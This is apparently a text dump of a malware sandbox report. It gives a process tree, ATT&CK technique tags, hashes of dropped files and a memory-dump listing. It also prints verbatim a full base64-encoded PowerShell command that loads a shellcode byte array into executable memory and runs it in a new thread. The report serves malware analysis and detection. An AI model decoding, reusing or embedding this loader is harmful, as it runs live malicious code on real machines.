AZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABVAEkATgBTACAAJABlACIAOwB9AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABYAFoASQBxACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWABaAEkAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwBhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgANQBhACwAMAB4AGEANQAsADAAeAAxADgALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADAANgAsADAAeAA0ADkALAAwAHgANAA3ACwAMAB4AGUAZAAsADAAeAA0AGEALAAwAHgAOAA1ACwAMAB4ADAAOAAsADAAeAAwAGUALAAwAHgAYgAyACwAMAB4ADUANgAsADAAeAA3ADcALAAwAHgAOAA2ACwAMAB4ADUANwAsADAAeAA2ADcALAAwAHgAYQA1ACwAMAB4AGYAYwAsADAAeAAxAGMALAAwAHgAZABhACwAMAB4ADcAOQAsADAAeAA3ADYALAAwAHgANwAwACwAMAB4AGQANwAsADAAeABmADIALAAwAHgAZABhACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAZgBiACwAMAB4ADUAMAAsADAAeABmAGEALAAwAHgAMwAwACwAMAB4ADAAYgAsADAAeABkADAALAAwAHgAYgAwACwAMAB4ADYANgAsADAAeAAyADIALAAwAHgAZABlACwAMAB4AGUAOAAsADAAeAA1AGIALAAwAHgAMgA1ACwAMAB4AGEAMgAsADAAeABmADIALAAwAHgAOABmACwAMAB4ADgANQAsADAAeAA5AGIALAAwAHgAMwBkACwAMAB4AGMAMgAsADAAeABjADQALAAwAHgAZABjACwAMAB4ADgAOAAsADAAeABhADgALAAwAHgAMgA5ACwAMAB4AGIAMAAsADAAeAA1AGQALAAwAHgAZAA4ACwAMAB4AGUANAAsADAAeAAyADUALAAwAHgAZQBhACwAMAB4ADkAYwAsADAAeAAzADQALAAwAHgANAA3ACwAMAB4ADMAYwAsADAAeABhAGIALAAwAHgAMAA1ACwAMAB4ADMAZgAsADAAeAAzADkALAAwAHgANgBjACwAMAB4AGYAMQAsADAAeABmADMALAAwAHgANAAwACwAMAB4AGIAZAAsADAAeABhAGEALAAwAHgAOAAwACwAMAB4ADEAYQAsADAAeAAxAGQALAAwAHgANABhACwAMAB4ADQANAAsADAAeAAxADEALAAwAHgAMQA1ACwAMAB4ADUANAAsADAAeABlAGYALAAwAHgAZQBjACwAMAB4AGQAMgAsADAAeAA1ADgALAAwAHgAYQA2ACwAMAB4ADYANQAsADAAeAAyAGUALAAwAHgAMgBhACwAMAB4ADAAOQAsADAAeAA4ADYALAAwAHgANABlACwAMAB4AGYAYQAsADAAeAA1AGIALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeABjAGQALAAwAHgAOQAxACwAMAB4ADkANAAsADAAeAAxADIALAAwAHgAMQA1ACwAMAB4ADkAMQAsADAAeAAwADQALAAwAHgANgAxACwAMAB4ADYAZAAsADAAeABlADEALAAwAHgAYgA5ACwAMAB4ADcAMgAsADAAeABiADYALAAwAHgAOQBiACwAMAB4ADYANQAsADAAeABmADYALAAwAHgAMgA5ACwAMAB4ADMAYgAsADAAeABlAGUALAAwAHgAYQAwACwAMAB4ADgAZAAsADAAeABiAGQALAAwAHgAMgAzACwAMAB4ADMANgAsADAAeAA0ADUALAAwAHgAYgAxACwAMAB4ADgAOAAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAOQAwACwAMAB4ADMAOQAsADAAeABlADIALAAwAHgAOAA0ACwAMAB4ADEANwAsADAAeABlAGUALAAwAHgANgAyACwAMAB4AGQAZQAsADAAeAAzADMALAAwAHgAMgBhACwAMAB4ADIAZQAsADAAeAA4ADUALAAwAHgANQBhACwAMAB4ADYAYgAsADAAeAA4AGEALAAwAHgANgA4ACwAMAB4ADYAMgAsADAAeAA2AGIALAAwAHgANwAyACwAMAB4AGQANQAsADAAeABjADYALAAwAHgAZQA3ACwAMAB4ADkAMQAsADAAeAAwADAALAAwAHgANwA2ACwAMAB4ADAAOAAsADAAeAA2AGEALAAwAHgAMgBkACwAMAB4ADIAYQAsADAAeAA5AGYALAAwAHgAYQA2ACwAMAB4AGUAMwAsADAAeABkADUALAAwAHgANQBmACwAMAB4AGEAMQAsADAAeAA3ADQALAAwAHgAYQA1ACwAMAB4ADYAZAAsADAAeAA2AGUALAAwAHgAMgBlACwAMAB4ADIAMQAsADAAeABkAGUALAAwAHgAZQA3ACwAMAB4AGUAOAAsADAAeABiADYALAAwAHgANQA3ACwAMAB4AGUAZgAsADAAeAAwAGIALAAwAHgANgA4ACwAMAB4AGQAZgAsADAAeAA2ADAALAAwAHgAZgAyACwAMAB4ADgAOQAsADAAeAAyADAALAAwAHgAYQA4ACwAMAB4ADMAMAAsADAAeABkAGQALAAwAHgANwAwACwAMAB4AGMAMgAsADAAeAA5ADEALAAwAHgANQBlACwAMAB4ADEAYgAsADAAeAAxADIALAAwAHgAMQBlACwAMAB4ADgAYgAsADAAeABiADYALAAwAHgAMQA4ACwAMAB4ADgAOAAsADAAeABmADQALAAwAHgAZQBmACwAMAB4ADMANwAsADAAeABjAGEALAAwAHgAOQBkACwAMAB4AGUAZAAsADAAeAA0ADcALAAwAHgAZABiACwAMAB4ADAAMQAsADAAeAA3AGIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADkALAAwAHgAMgBiACwAMAB4ADcAZQAsADAAeAA2AGIALAAwAHgANQBhACwAMAB4ADgAYwAsADAAeAAyAGUALAAwAHgAMAAzACwAMAB4AGIAMAAsADAAeAAwADMALAAwAHgAMQAwACwAMAB4ADMAMwAsADAAeABiAGIALAAwAHgAYwA5ACwAMAB4ADMAOQAsADAAeABkADkALAAwAHgANQA0ACwAMAB4AGEANAAsADAAeAAxADIALAAwAHgANwA1ACwAMAB4AGMAYwAsADAAeABlAGQALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAxADEALAAwAHgAMwA4ACwAMAB4ADkANAAsADAAeAAyADYALAAwAHgAOQA5ACwAMAB4AGMAZgAsADAAeAA2ADgALAAwAHgAZQA4ACwAMAB4ADYAYQAsADAAeABhADUALAAwAHgANwBhACwAMAB4ADkAYwAsADAAeAA5AGEALAAwAHgAZgAwACwAMAB4ADIAMQAsADAAeAAwAGEALAAwAHgAYQA0ACwAMAB4ADIAZQAsADAAeAA0AGYALAAwAHgAYgAyACwAMAB4ADMAMAAsADAAeABkADUALAAwAHgAYwA2ACwAMAB4AGUANQAsADAAeABhAGMALAAwAHgAZAA3ACwAMAB4ADMAZgAsADAAeABjADEALAAwAHgANwAyACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANQBhACwAMAB4AGIAYQAsADAAeABiAGQALAAwAHgAZAA1ACwAMAB4ADMANAAsADAAeABjADMALAAwAHgANQAxACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAOQA1ACwAMAB4ADMAYgAsADAAeABkADYALAAwAHgAYQBjACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAOAA1ACwAMAB4AGMAOQAsADAAeAA4AGQALAAwAHgAYgA1ACwAMAB4AGIAOQAsADAAeAA0ADIALAAwAHgAMQA4ACwAMAB4ADMANgAsADAAeABlADgALAAwAHgAMwA3ACwAMAB4ADgAYgAsADAAeAA1AGUALAAwAHgAMQA2ACwAMAB4ADYAZQAsADAAeABmAGIALAAwAHgAYwAwACwAMAB4AGUAOQAsADAAeAA0ADUALAAwAHgAZgBkACwAMAB4ADMAZAAsADAAeAAzAGMALAAwAHgAYQAzACwAMAB4ADgAYgAsADAAeAAyAGYALAAwAHgAZgBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABDAGkAagBGAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABDAGkAagBGAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABDAGkAagBGACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2780
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ewu7bas.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2604
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B04.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6B03.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4ewu7bas.dll

Filesize
3KB

MD5
fb4ae0224605aad03ddfb4a36a31d5bc

SHA1
4c42f0a2ebe6b6529d8b5a043e8fc7bfe4df4b9d

SHA256
7a75342b9b96cb3b58f9f906548a24027113b8ffcec7e3906e7c300c0d6e5e83

SHA512
8c7ad70062c4c71b5c81fa3a4f448a91d7db13576926b5747d777bff85323108e495b5bf027351e54d9c40d7f64fbe640cb00f7c2764e8ad8ea95e64ba1ebc43

Download Submit
C:\Users\Admin\AppData\Local\Temp\4ewu7bas.pdb

Filesize
7KB

MD5
c8916137a4642e9ff3707118f624b604

SHA1
bf7d8f5a8a28f45ab1053d5d38d3908af1cd0c2c

SHA256
04bc834d1f584af1f65960a583ba8a93f1fdd71ff127b0488606aeddfbd15d47

SHA512
f6c3639749751b62bff01a2719e46afdae75652625d70aa2a5d25e49759ea30964ec191f6eaedb7d6dd47e457cd575b41060d73d2c1f61b9677e67c693e620f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6B04.tmp

Filesize
1KB

MD5
3b5ff43fa5ce4f623aadfc4f3af480a2

SHA1
c1b29441350e651cf7636e4f909ba9d487012a82

SHA256
eacbd741a44f6ceca35303623b7d751d12c6c72b9134e80571abf71b2c4a92e6

SHA512
c34f7697c373344e5aebd891d9eb7426f8cb68de5c677db5fc944079cdbaf77aa8f595e8d9e079b0d995eeb1f80092fc87d4fd99eadfc3ba5d73c330bc654a7d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\09MYW41TJN0SLN5ZTJR6.temp

Filesize
7KB

MD5
e078498a596c6e81c8a5c3bbd5ed7526

SHA1
b6623978f727c714919152f973583feb1e6cd5d6

SHA256
ec3d241f20fa93e465c57a5144215a596c61a5051a5832a76a6923a60e16fc59

SHA512
8ce7a0b20f7098f8d8a273c8e538f91a4417c0e829c0387f7fdbadeaa6fd33b5a70bec14b8b0b12a3c01f1659fa6b12715a9ee515114f6f886667516322b8887

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4ewu7bas.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4ewu7bas.cmdline

Filesize
309B

MD5
a99bb74df8e674b54d163871dd62982b

SHA1
a1b5824e25ce7184ee0c47519e47badbab6c2cb8

SHA256
04e6fb00077b255fe61ac76a3f6454831554b64b739237d4bd3d987cea827239

SHA512
8d4331451a01f1d78635444fb4772434988c4aaf105c796cef73b81140928767ea7f1a570e465475cf3a9a83b52171644082e7da4b54c257f1374b8278dc2063

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6B03.tmp

Filesize
652B

MD5
d2d2c2003abff6258fce71da12e58420

SHA1
31130999b0d9cf26294a16fd81eaf980b4abad0b

SHA256
f05140b226a36084bf19ec5bf0cab3b73c2a30e21f51bf41879a79735bcd708b

SHA512
ea0e9e299422dd37ddbf1d84e98986b59898cd3f6257f944413badfec1dbbe6e3bb86d9526797bde09071375379eba741672fcffc098aa387b1268e26fafc72a

Download Submit
memory/2688-1-0x00000000002F0000-0x00000000002FA000-memory.dmp

Filesize
40KB

Download
memory/2688-0-0x000007FEF58E3000-0x000007FEF58E4000-memory.dmp

Filesize
4KB

Download
memory/2688-32-0x000007FEF58E3000-0x000007FEF58E4000-memory.dmp

Filesize
4KB

Download
memory/2712-7-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2712-11-0x000007FEF39B0000-0x000007FEF434D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-10-0x000007FEF39B0000-0x000007FEF434D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-8-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2712-12-0x000007FEF39B0000-0x000007FEF434D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-6-0x000007FEF3C6E000-0x000007FEF3C6F000-memory.dmp

Filesize
4KB

Download
memory/2712-9-0x000007FEF39B0000-0x000007FEF434D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-13-0x000007FEF39B0000-0x000007FEF434D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-33-0x000007FEF3C6E000-0x000007FEF3C6F000-memory.dmp

Filesize
4KB

Download
memory/2712-34-0x000007FEF39B0000-0x000007FEF434D000-memory.dmp

Filesize
9.6MB

Download
memory/2780-31-0x0000000002C80000-0x0000000002C81000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads